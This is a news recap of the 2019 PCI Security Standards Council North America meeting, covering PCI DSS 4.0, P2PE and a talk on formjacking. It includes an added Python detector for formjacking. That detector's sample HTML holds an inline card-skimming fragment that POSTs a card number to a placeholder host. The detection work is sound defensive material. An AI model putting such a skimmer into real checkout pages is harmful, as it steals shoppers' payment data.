With the PCI Security Standards Council Europe Community Meeting just a few weeks away, check out this recap of the PCI DSS 4.0 highlights from September’s PCI North American Meeting in The Green Sheet, with commentary by our Chief Strategy Officer, Ruston Miles, and leaders from ControlScan and SecurityMetrics.
The PCI Security Standards Council’s annual North America Community Meeting, held Sept. 17 to 19, 2019, in Vancouver, B.C., drew more than 1,300 attendees. Top agenda items included upcoming releases of the PCI Standard for contactless payments on commercial off-the-shelf (COTS) mobile devices and PCI Data Security Standard Version 4.0 (PCI DSS 4.0).
In addition to continually updating security standards, the PCI SSC is promoting interaction and innovation among payments industry stakeholders, noted Troy Leach, the Council’s chief technology officer. Recent efforts discussed at the meeting include a Request for Comment (RFC) process, currently employed in the PCI Data Security Standard Version 4.0 Request for Comments initiative; the PCI Software Security Framework, which supports agile innovation within approved process guidelines; and the P2PE Standard and Program.
“At last year’s community meeting, these new engagement models were still being designed and we had just created the framework for new areas of engagement,” Leach said. “Seeing the fruits of their labor has energized the industry.” He expects the newly implemented RFC process to improve collaboration when developing next-generation security standards for “a quickly changing world of payments.”
PCI DSS 4.0
Participating members and attendees praised PCI DSS 4.0 and the Council’s renewed focus on collaboration.
Ruston Miles, chief strategy officer, executive vice president and founder at Bluefin, said PCI DSS 4.0 will be easier to understand and implement and “a significant upgrade to the standard in terms of usability and user experience.” Miles was also pleased that P2PE is a top-of-mind topic and is being adopted at a growing pace. Reworking existing standards and organizational structures will improve the user experience, he added.
Marc Punzirudu, vice president, security consulting services at ControlScan, said, “PCI 4.0 will give entities that have established security programs the ability to perform alternative validation of controls.” This significantly improves the standard by replacing compensating controls with objective-based control tests, he stated.
“I’m also personally energized about the Small Merchant Taskforce I’m a part of, because we will be reviewing and commenting on the PCI 4.0 SAQs as they start getting developed,” added Chris Bucolo, vice president of market strategy at ControlScan. “In doing so, we have the opportunity to consolidate and streamline concepts where possible.”
Jen Stone, senior security analyst at SecurityMetrics, presented on formjacking, a cybercrime that intercepts web pages and payment forms. Malicious JavaScript code collects payment card numbers and other personally identifiable information and sends data to another location of the attackers’ choosing, she explained.
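As an added illustration of the formjacking pattern Stone describes (this is not code from the article, from SecurityMetrics or from the Council): a small static triage check over a checkout page's HTML that flags script tags loaded from origins outside an allowlist, and inline scripts that both read card fields and send data to a non-allowlisted origin. The allowed origins, the sample HTML and the placeholder domains are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the merchant's own origins; any other origin that loads script
# into, or receives data from, the checkout page deserves a closer look.
ALLOWED_ORIGINS = {"https://shop.example", "https://cdn.example"}
CARD_FIELD = re.compile(r"\b(card|pan|cvv|cvc|expir|ccnum)", re.I)
EXFIL_CALL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|Image)\b")
URL_IN_JS = re.compile(r"https?://[^\s'\"(),]+")

class ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from the page.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []  # begin buffering an inline script body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def origin(url):
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}" if p.scheme and p.netloc else None

def find_formjacking_indicators(html, allowed=ALLOWED_ORIGINS):
    """(indicator, origin) pairs for off-allowlist script sources and exfil targets."""
    p = ScriptCollector()
    p.feed(html)
    findings = [("external-script", o) for o in map(origin, p.external)
                if o and o not in allowed]
    for body in p.inline:  # inline code that reads card fields and sends them out
        if CARD_FIELD.search(body) and EXFIL_CALL.search(body):
            findings += [("inline-exfil", o) for o in map(origin, URL_IN_JS.findall(body))
                         if o and o not in allowed]
    return findings

# Constructed checkout page: one legitimate CDN script, one third-party script,
# and an inline fragment that reads the card field and posts it elsewhere.
SAMPLE_HTML = """<form id="pay"><input id="cardNumber"></form>
<script src="https://cdn.example/pay.js"></script><script src="https://static.placeholder.test/t.js"></script>
<script>var n=document.getElementById('cardNumber').value;
fetch('https://collect.placeholder.test/c',{method:'POST',body:n});</script>"""
```

Run against a real page this is a triage aid, not proof: a legitimate tag manager will trip the external-script check and a skimmer can hide its destination behind string building, so the findings are a list of things to inspect.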
“A great part of collaborating with the Council is being able to talk about these trends,” she said. “Half a dozen security analysts came up after the presentation and said, ‘that was a great piece.’”
For further details, please visit www.pcisecuritystandards.org.